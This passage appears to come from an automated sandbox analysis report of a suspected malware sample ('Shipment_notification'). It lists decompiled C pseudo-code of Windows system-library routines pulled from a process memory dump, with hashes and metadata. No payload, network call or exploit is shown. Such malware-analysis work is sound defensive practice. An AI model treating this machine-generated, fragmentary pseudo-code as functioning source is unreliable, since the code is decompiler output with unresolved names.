                                                                                																				_t77 = E01BB9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                                																				__eflags = _t77;
                                                                                																				if(_t77 == 0) {
                                                                                																					_t74 = 0;
                                                                                																					__eflags = 0;
                                                                                																				} else {
                                                                                																					_t74 = _t77 + 0xfffffff4;
                                                                                																				}
                                                                                																				 *(_t104 - 0x34) = _t74;
                                                                                																				_t82 = _t82 + 1;
                                                                                																				continue;
                                                                                																			}
                                                                                																			break;
                                                                                																		}
                                                                                																		_t102 = _t102 + 1;
                                                                                																		continue;
                                                                                																	}
                                                                                																	goto L20;
                                                                                																}
                                                                                																__eflags = _t74;
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                													break;
                                                                                												}
                                                                                												L20:
                                                                                												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                                                												 *((char*)(_t99 + 0xe5)) = 1;
                                                                                												 *((char*)(_t104 - 0x1d)) = 1;
                                                                                												goto L21;
                                                                                											}
                                                                                										}
                                                                                										L21:
                                                                                										 *(_t104 - 4) = 0xfffffffe;
                                                                                										E01AE922A(_t99);
                                                                                										_t64 = E01B07D50();
                                                                                										__eflags = _t64;
                                                                                										if(_t64 != 0) {
                                                                                											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                										} else {
                                                                                											_t67 = 0x7ffe0386;
                                                                                										}
                                                                                										__eflags =  *_t67;
                                                                                										if( *_t67 != 0) {
                                                                                											_t67 = E01BB8B58(_t99);
                                                                                										}
                                                                                										__eflags =  *((char*)(_t104 - 0x1d));
                                                                                										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                                                											__eflags = _t99 -  *0x1bd86c0; // 0x15807b0
                                                                                											if(__eflags != 0) {
                                                                                												__eflags = _t99 -  *0x1bd86b8; // 0x0
                                                                                												if(__eflags == 0) {
                                                                                													_t94 = 0x1bd86bc;
                                                                                													_t87 = 0x1bd86b8;
                                                                                													goto L27;
                                                                                												} else {
                                                                                													__eflags = _t67 | 0xffffffff;
                                                                                													asm("lock xadd [edi], eax");
                                                                                													if(__eflags == 0) {
                                                                                														E01AE9240(_t80, _t99, _t99, _t102, __eflags);
                                                                                													}
                                                                                												}
                                                                                											} else {
                                                                                												_t94 = 0x1bd86c4;
                                                                                												_t87 = 0x1bd86c0;
                                                                                												L27:
                                                                                												E01B19B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                                                											}
                                                                                										}
                                                                                									} else {
                                                                                										goto L13;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						return E01B3D130(_t80, _t99, _t102);
                                                                                					} else {
                                                                                						 *_t51 = 0x1bd5388;
                                                                                						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                                                						 *_t84 = _t51;
                                                                                						 *0x1bd538c = _t51;
                                                                                						goto L6;
                                                                                					}
                                                                                				}
                                                                                			}





















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aa6d3e69103537e356a3cf356183482b8e34042acc1e9c2d9390034792f37e01
                                                                                • Instruction ID: e189643fb7af4a0ca93023d2beafc27cb330c00d7563b28398b097f71b8b1532
                                                                                • Opcode Fuzzy Hash: aa6d3e69103537e356a3cf356183482b8e34042acc1e9c2d9390034792f37e01
                                                                                • Instruction Fuzzy Hash: EA01DC726023009FC72E8F08D884B12BFF9EB85338F2540A6E2068B692D770DC81CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 46%
                                                                                			E01B7C450(intOrPtr* _a4) {
                                                                                				signed char _t25;
                                                                                				intOrPtr* _t26;
                                                                                				intOrPtr* _t27;
                                                                                
                                                                                				_t26 = _a4;
                                                                                				_t25 =  *(_t26 + 0x10);
                                                                                				if((_t25 & 0x00000003) != 1) {
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push( *((intOrPtr*)(_t26 + 8)));
                                                                                					_push(0);
                                                                                					_push( *_t26);
                                                                                					E01B29910();
                                                                                					_t25 =  *(_t26 + 0x10);
                                                                                				}
                                                                                				if((_t25 & 0x00000001) != 0) {
                                                                                					_push(4);
                                                                                					_t7 = _t26 + 4; // 0x4
                                                                                					_t27 = _t7;
                                                                                					_push(_t27);
                                                                                					_push(5);
                                                                                					_push(0xfffffffe);
                                                                                					E01B295B0();
                                                                                					if( *_t27 != 0) {
                                                                                						_push( *_t27);
                                                                                						E01B295D0();
                                                                                					}
                                                                                				}
                                                                                				_t8 = _t26 + 0x14; // 0x14
                                                                                				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                                                					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                                                				}
                                                                                				_push( *_t26);
                                                                                				E01B295D0();
                                                                                				return L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                                                			}







                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                • Instruction ID: 78a89d5bfa15f0170118030f41e11a3790363adc5ae294cda969e33ea927565e
                                                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                • Instruction Fuzzy Hash: ED019671240616BFEB19AF69CC80E62FF6DFF54794F104569F25842560CB21ACA0C7A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E01BB4015(signed int __eax, signed int __ecx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				signed char _t10;
                                                                                				signed int _t28;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_t28 = __ecx;
                                                                                				asm("lock xadd [edi+0x24], eax");
                                                                                				_t10 = (__eax | 0xffffffff) - 1;
                                                                                				if(_t10 == 0) {
                                                                                					_t1 = _t28 + 0x1c; // 0x1e
                                                                                					E01B02280(_t10, _t1);
                                                                                					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                					E01B02280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x1bd86ac);
                                                                                					E01AEF900(0x1bd86d4, _t28);
                                                                                					E01AFFFB0(0x1bd86ac, _t28, 0x1bd86ac);
                                                                                					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                                                					E01AFFFB0(0, _t28, _t1);
                                                                                					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                                                					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                                                						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                                                					}
                                                                                					_t10 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                                				}
                                                                                				return _t10;
                                                                                			}








                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 505af358ba2ab81988c55a61737745af7727cccbc27f346b60d047953292d122
                                                                                • Instruction ID: 5636a186cf79d1e1e68564edc9112080857cf0cd2dfeb9fbde525e99ecb3df56
                                                                                • Opcode Fuzzy Hash: 505af358ba2ab81988c55a61737745af7727cccbc27f346b60d047953292d122
                                                                                • Instruction Fuzzy Hash: A201AC722015467FD619AB79CD84E53FBACFF55660B000259F60883A51DB24EC11C6E4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E01BA14FB(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				short _v54;
                                                                                				char _v60;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed char* _t21;
                                                                                				void* _t27;
                                                                                				intOrPtr _t33;
                                                                                				intOrPtr _t34;
                                                                                				signed int _t35;
                                                                                
                                                                                				_t32 = __edx;
                                                                                				_t27 = __ebx;
                                                                                				_v8 =  *0x1bdd360 ^ _t35;
                                                                                				_t33 = __edx;
                                                                                				_t34 = __ecx;
                                                                                				E01B2FA60( &_v60, 0, 0x30);
                                                                                				_v20 = _a4;
                                                                                				_v16 = _a8;
                                                                                				_v28 = _t34;
                                                                                				_v24 = _t33;
                                                                                				_v54 = 0x1034;
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t21 = 0x7ffe0388;
                                                                                				} else {
                                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                				}
                                                                                				_push( &_v60);
                                                                                				_push(0x10);
                                                                                				_push(0x20402);
                                                                                				return L01B2B640(E01B29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
                                                                                			}


















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2567ea55e0c51fcd786740219341068e30a39281a7e0a1025cfe175570253339
                                                                                • Instruction ID: 1b828bb5bb8328aa9d1a5de25b674af82eab755bacf213310172c4261910a52b
                                                                                • Opcode Fuzzy Hash: 2567ea55e0c51fcd786740219341068e30a39281a7e0a1025cfe175570253339
                                                                                • Instruction Fuzzy Hash: 49019671A01258AFCF18DFA8D841EAEBBB8EF45710F404096F944EB280DB70DA04CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E01BA138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				short _v54;
                                                                                				char _v60;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed char* _t21;
                                                                                				void* _t27;
                                                                                				intOrPtr _t33;
                                                                                				intOrPtr _t34;
                                                                                				signed int _t35;
                                                                                
                                                                                				_t32 = __edx;
                                                                                				_t27 = __ebx;
                                                                                				_v8 =  *0x1bdd360 ^ _t35;
                                                                                				_t33 = __edx;
                                                                                				_t34 = __ecx;
                                                                                				E01B2FA60( &_v60, 0, 0x30);
                                                                                				_v20 = _a4;
                                                                                				_v16 = _a8;
                                                                                				_v28 = _t34;
                                                                                				_v24 = _t33;
                                                                                				_v54 = 0x1033;
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t21 = 0x7ffe0388;
                                                                                				} else {
                                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                				}
                                                                                				_push( &_v60);
                                                                                				_push(0x10);
                                                                                				_push(0x20402);
                                                                                				return L01B2B640(E01B29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
                                                                                			}


















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dc5939dc059589b61d0e821c75fa509d2ca521b35bfff7ebd2b06115d8f5e4e4
                                                                                • Instruction ID: 4d10a5dd6a1af4c523f7525cb16f1520d13f9db097f389e9c9a966e25c418f13
                                                                                • Opcode Fuzzy Hash: dc5939dc059589b61d0e821c75fa509d2ca521b35bfff7ebd2b06115d8f5e4e4
                                                                                • Instruction Fuzzy Hash: 42015671A05219AFDB18DFA9D981EAEBBF8EF45710F404096F904EB280DB749A05C794
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E01AE58EC(void* __ecx) {
                                                                                				signed int _v8;
                                                                                				char _v28;
                                                                                				char _v44;
                                                                                				char _v76;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr _t16;
                                                                                				void* _t17;
                                                                                				void* _t27;
                                                                                				intOrPtr _t28;
                                                                                				signed int _t29;
                                                                                
                                                                                				_v8 =  *0x1bdd360 ^ _t29;
                                                                                				_t10 =  *[fs:0x30];
                                                                                				_t27 = __ecx;
                                                                                				if(_t10 == 0) {
                                                                                					L6:
                                                                                					_t28 = 0x1ac5c80;
                                                                                				} else {
                                                                                					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                					if(_t16 == 0) {
                                                                                						goto L6;
                                                                                					} else {
                                                                                						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                                                					}
                                                                                				}
                                                                                				if(E01AE5943() != 0 &&  *0x1bd5320 > 5) {
                                                                                					E01B67B5E( &_v44, _t27);
                                                                                					_t22 =  &_v28;
                                                                                					E01B67B5E( &_v28, _t28);
                                                                                					_t11 = E01B67B9C(0x1bd5320, 0x1acbf15,  &_v28, _t22, 4,  &_v76);
                                                                                				}
                                                                                				return L01B2B640(_t11, _t17, _v8 ^ _t29, 0x1acbf15, _t27, _t28);
                                                                                			}
















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 97278816faae921198ad1eb9f27cf18b9e86f17fe3ecfbf600e087dd180ea3d0
                                                                                • Instruction ID: 508cb0861b8648115d2604e449807fda2f9e007058076931a39cc7c2c31a1b54
                                                                                • Opcode Fuzzy Hash: 97278816faae921198ad1eb9f27cf18b9e86f17fe3ecfbf600e087dd180ea3d0
                                                                                • Instruction Fuzzy Hash: 9901DF35E001099BDB28EF68E854AAE77FCEB56134F4800A9EA05D7344EF20ED018690
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01AFB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                                				signed char _t11;
                                                                                				signed char* _t12;
                                                                                				intOrPtr _t24;
                                                                                				signed short* _t25;
                                                                                
                                                                                				_t25 = __edx;
                                                                                				_t24 = __ecx;
                                                                                				_t11 = ( *[fs:0x30])[0x50];
                                                                                				if(_t11 != 0) {
                                                                                					if( *_t11 == 0) {
                                                                                						goto L1;
                                                                                					}
                                                                                					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                					L2:
                                                                                					if( *_t12 != 0) {
                                                                                						_t12 =  *[fs:0x30];
                                                                                						if((_t12[0x240] & 0x00000004) == 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						if(E01B07D50() == 0) {
                                                                                							_t12 = 0x7ffe0385;
                                                                                						} else {
                                                                                							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                						}
                                                                                						if(( *_t12 & 0x00000020) == 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						return E01B67016(_a4, _t24, 0, 0, _t25, 0);
                                                                                					}
                                                                                					L3:
                                                                                					return _t12;
                                                                                				}
                                                                                				L1:
                                                                                				_t12 = 0x7ffe0384;
                                                                                				goto L2;
                                                                                			}








                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                • Instruction ID: 91122ced57e7454df9f2a6d66c6d9e3e384aac0dd03eb2b9cea76089a7b483c5
                                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                • Instruction Fuzzy Hash: EE015E722445809FE726C76CC944F667BE8EB95650F0940A5BA19CB651D738DC40C621
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E01BB1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                                				char _v8;
                                                                                				void* _v11;
                                                                                				unsigned int _v12;
                                                                                				void* _v15;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				unsigned int _t13;
                                                                                				char* _t16;
                                                                                				signed int* _t35;
                                                                                
                                                                                				_t22 = __ebx;
                                                                                				_t35 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t13 =  !( *__ecx) + 1;
                                                                                				_v12 = _t13;
                                                                                				if(_a4 != 0) {
                                                                                					_push((_t13 >> 0x14) + (_t13 >> 0x14));
                                                                                					L01BB165E(__ebx, 0x1bd8ae4, (__edx -  *0x1bd8b04 >> 0x14) + (__edx -  *0x1bd8b04 >> 0x14), __edi, __ecx, (__edx -  *0x1bd8b04 >> 0x14) + (__edx -  *0x1bd8b04 >> 0x14));
                                                                                				}
                                                                                				E01BAAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t16 = 0x7ffe0388;
                                                                                				} else {
                                                                                					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                				}
                                                                                				if( *_t16 != 0) {
                                                                                					_t16 = L01B9FE3F(_t22, _t35, _v8, _v12);
                                                                                				}
                                                                                				return _t16;
                                                                                			}













                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 74d2a641c246fc64940c8e68495ac099e6bcf001a340a52e9ee6d0c38879a773
                                                                                • Instruction ID: e48bcb6a2ed1b198bf626c258d3b51c4fe9bc35692508c60f7d3f7bef4cad38f
                                                                                • Opcode Fuzzy Hash: 74d2a641c246fc64940c8e68495ac099e6bcf001a340a52e9ee6d0c38879a773
                                                                                • Instruction Fuzzy Hash: 640128726047429BCB19EB2CD880B6A7BD5EB84310F0486A9F98583690EF71D440CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E01BB8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                				signed int _v12;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v40;
                                                                                				short _v66;
                                                                                				char _v72;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed char* _t18;
                                                                                				signed int _t32;
                                                                                
                                                                                				_t29 = __edx;
                                                                                				_v12 =  *0x1bdd360 ^ _t32;
                                                                                				_t31 = _a8;
                                                                                				_t30 = _a12;
                                                                                				_v66 = 0x1c20;
                                                                                				_v40 = __ecx;
                                                                                				_v36 = __edx;
                                                                                				_v32 = _a4;
                                                                                				_v28 = _a8;
                                                                                				_v24 = _a12;
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t18 = 0x7ffe0386;
                                                                                				} else {
                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                				}
                                                                                				_push( &_v72);
                                                                                				_push(0x14);
                                                                                				_push(0x20402);
                                                                                				return L01B2B640(E01B29AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
                                                                                			}

















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eaac33d3dd8d694fc22a1e4038d9b9f4ac775982650fed8112727b1dc6ab2ba3
                                                                                • Instruction ID: 68ea30d60cea30c14cc6bbaca1c4fd46910975e719c5dba649f86650e403f4ce
                                                                                • Opcode Fuzzy Hash: eaac33d3dd8d694fc22a1e4038d9b9f4ac775982650fed8112727b1dc6ab2ba3
                                                                                • Instruction Fuzzy Hash: 69012171A0121D9FCB04DFA9D9819EEBBB8EF59710F10409AF904E7351DB74A901CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01AEDB60(signed int __ecx) {
                                                                                				intOrPtr* _t9;
                                                                                				void* _t12;
                                                                                				void* _t13;
                                                                                				intOrPtr _t14;
                                                                                
                                                                                				_t9 = __ecx;
                                                                                				_t14 = 0;
                                                                                				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                                                					_t13 = 0xc000000d;
                                                                                				} else {
                                                                                					_t14 = E01AEDB40();
                                                                                					if(_t14 == 0) {
                                                                                						_t13 = 0xc0000017;
                                                                                					} else {
                                                                                						_t13 = E01AEE7B0(__ecx, _t12, _t14, 0xfff);
                                                                                						if(_t13 < 0) {
                                                                                							L01AEE8B0(__ecx, _t14, 0xfff);
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                                                							_t14 = 0;
                                                                                						} else {
                                                                                							_t13 = 0;
                                                                                							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				 *_t9 = _t14;
                                                                                				return _t13;
                                                                                			}








                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                • Instruction ID: f9af7377fc827f103d668c6527b4eb98d21608d460389c5778ebe51d52196aa5
                                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                • Instruction Fuzzy Hash: E2F096336416239BDB326BD98988F6BBAE59FD1A60F1A0035F2059B344DE608C0296E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01AEB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                                                				signed char* _t13;
                                                                                				intOrPtr _t22;
                                                                                				char _t23;
                                                                                
                                                                                				_t23 = __edx;
                                                                                				_t22 = __ecx;
                                                                                				if(E01B07D50() != 0) {
                                                                                					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                				} else {
                                                                                					_t13 = 0x7ffe0384;
                                                                                				}
                                                                                				if( *_t13 != 0) {
                                                                                					_t13 =  *[fs:0x30];
                                                                                					if((_t13[0x240] & 0x00000004) == 0) {
                                                                                						goto L3;
                                                                                					}
                                                                                					if(E01B07D50() == 0) {
                                                                                						_t13 = 0x7ffe0385;
                                                                                					} else {
                                                                                						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                					}
                                                                                					if(( *_t13 & 0x00000020) == 0) {
                                                                                						goto L3;
                                                                                					}
                                                                                					return E01B67016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                                                				} else {
                                                                                					L3:
                                                                                					return _t13;
                                                                                				}
                                                                                			}







                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                • Instruction ID: cb9692234e239f97b3f6122feb89762ec061f6c5c167c78d0b2c3c4c719d75a9
                                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                • Instruction Fuzzy Hash: CD01A432200680ABEB2B975DC80CF69BFD9EF51754F0940E1FA148B6B2EB79D810D725
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 71%
                                                                                			E01B7FE87(intOrPtr __ecx) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				signed int _v24;
                                                                                				intOrPtr _v28;
                                                                                				short _v54;
                                                                                				char _v60;
                                                                                				signed char* _t21;
                                                                                				void* _t27;
                                                                                				void* _t32;
                                                                                				void* _t33;
                                                                                				void* _t34;
                                                                                				signed int _t35;
                                                                                
                                                                                				_v8 =  *0x1bdd360 ^ _t35;
                                                                                				_v16 = __ecx;
                                                                                				_v54 = 0x1722;
                                                                                				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                                                				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                                                				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t21 = 0x7ffe0382;
                                                                                				} else {
                                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                                                				}
                                                                                				_push( &_v60);
                                                                                				_push(0x10);
                                                                                				_push(0x20402);
                                                                                				return L01B2B640(E01B29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
                                                                                			}

















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c2c153592283712cf6a3ce3d323edc56b5bdd2bad189cb3538ae2a1320390529
                                                                                • Instruction ID: 9de1c36a4e2657f36cb14e74e67e599be01ade721835f3bfc00f62709648f525
                                                                                • Opcode Fuzzy Hash: c2c153592283712cf6a3ce3d323edc56b5bdd2bad189cb3538ae2a1320390529
                                                                                • Instruction Fuzzy Hash: 98016270A00219AFCB18DFA8D542A6EBBF4EF04704F1045A9F958DB382DB35E901CB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 73%
                                                                                			E01BA131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				short _v50;
                                                                                				char _v56;
                                                                                				signed char* _t18;
                                                                                				void* _t24;
                                                                                				void* _t30;
                                                                                				void* _t31;
                                                                                				signed int _t32;
                                                                                
                                                                                				_t29 = __edx;
                                                                                				_v8 =  *0x1bdd360 ^ _t32;
                                                                                				_v20 = _a4;
                                                                                				_v12 = _a8;
                                                                                				_v24 = __ecx;
                                                                                				_v16 = __edx;
                                                                                				_v50 = 0x1021;
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t18 = 0x7ffe0380;
                                                                                				} else {
                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                				}
